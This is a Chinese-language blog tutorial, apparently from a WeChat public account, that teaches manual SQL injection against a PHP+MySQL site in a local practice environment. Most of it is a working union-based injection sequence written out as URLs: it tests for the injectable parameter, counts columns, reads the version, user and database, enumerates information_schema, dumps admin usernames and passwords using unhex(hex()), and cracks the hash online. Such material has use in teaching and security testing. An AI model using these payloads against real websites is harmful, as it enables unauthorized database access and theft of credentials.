【SQL注入】通过实战教你手工注入MySql数据库

Hello，各位小伙伴们大家晚上好~~

不知不觉，已经是本公众号的第八篇技术文章了，你们都有认真阅读吗？

正当小编发愁下一篇写什么的时候，鲁迅发话了：

好吧，那么我们就一起来学习一下，对PHP+MySql组合的网站，怎么进行纯手工注入吧，Here we go~

一、准备准备

NPMserv：

PHP + Mysql 集成环境，下载后在windows虚拟机中解压即可使用。

链接：https://pan.baidu.com/s/1TWoQ3PLo_SWX-FEATQVeHQ
提取码，请关注公众号并回复 SQL注入即可获取~

二、实战篇

网站搭建完成后，我们就可以通过浏览器直接进行访问了~

1、寻找注入点

任意点开一片文章，我们会发现url处出现了"id"字样，猜测网站通过id号从数据库中调取不同的文章：

修改"id=43"，发现果然打开了一篇其他的文章：

接下来我们来判断此处是否为注入点吧~

输入http://192.168.211.135/dy_show.php?dy_id=43 and 1=1 页面显示正常

输入http://192.168.211.135/dy_show.php?dy_id=43 and 1=2 查询失败

说明此处存在注入点

2、测试注入点所在table的字段数目

输入 http://192.168.211.135/dy_show.php?dy_id=42 order by 5 查询失败

输入 http://192.168.211.135/dy_show.php?dy_id=42 order by 4 查询成功

由此我们可以判断字段数为4

3、查询version、database等信息

已知当前表项的字段数为4，我们先通过union select 来判断一下哪些字段所在的内容会显示在网页上，并加上and 1=2 ，让网站原本的内容不被显示出来。

输入 http://192.168.211.135/dy_show.php?dy_id=43 and 1=2 union select 1,2,3,4

可以看到 2，3查询点被显示了出来。

接下来我们将2，3替换为version()，和user()，查询结果如下：

可以看出当前Mysql数据版本在5.0以上，当前查询账号为root管理员账号

桥豆麻袋，Mysql 5.0 代表什么？说明支持 information_schema 数据库呀~，该数据库中存储着用户在MySQL中创建的所有其它所有数据库的信息。

在进行下一步之前，我们先查询一下当前的数据库，输入

http://192.168.211.135/dy_show.php?dy_id=43 and 1=2 union select 1,database(),3,4

查询处数据库为govcn

4、查询表名

information_schema中存放了三张重要的数据表，如下：

schemata：用于存放所有数据库的名字。
tables：用于存放所有数据库中的数据表的名字。
columns：用于存放所有数据库的所有数据表中的所有字段的名字。

使用tables表，我们先来查询 govcn 数据库中有哪些表，在输入点2查询表名

输入：http://192.168.211.135/dy_show.php?dy_id=42 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘govcn’

But，当存在大量表时，此处会显示得非常混乱，我们用group_concat()函数来将table_name查询内容进行整合。

输入：

http://192.168.211.135/dy_show.php?dy_id=43 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘govcn’

可以看到 govcn 数据库中得表单都被查询了出来，接下来我们就可以从admin表中查询用户的账号、密码了。

5、查询指定表中的字段

首先从information_schema.columns中查询表名，输入：

http://192.168.211.135/dy_show.php?dy_id=43 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘admin’

发现该标中的字段名为username和password，知道表名，又知道了表的字段名，那我们就可以直接查询这些字段的内容了~

6、查询用户名及密码

输入：http://192.168.211.135/dy_show.php?dy_id=42 and 1=2 union select 1,username,password,4 from admin

此处什么都没显示出来，可能因为账号密码的格式与网页格式不同，显示不出来，需要使用unhex(hex())函数进行编码转换。

输入：http://192.168.211.135/dy_show.php?dy_id=42 and 1=2 union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin

查询结果如下，成功爆出用户名、密码：

将密码在CMD5等网站进行破解，结果如下：

这样我们就成功获取了用户名admin，密码admin了~

以上就是今天Mysql手工注入的教程，大家都明白了吗？

之前小编有写过一期通过sqlmap对该网站进行注入的文章，没看过的小伙伴可以回顾一下哦~

好啦，这就是今天的全部内容，欢迎关注我的公众号~

peace！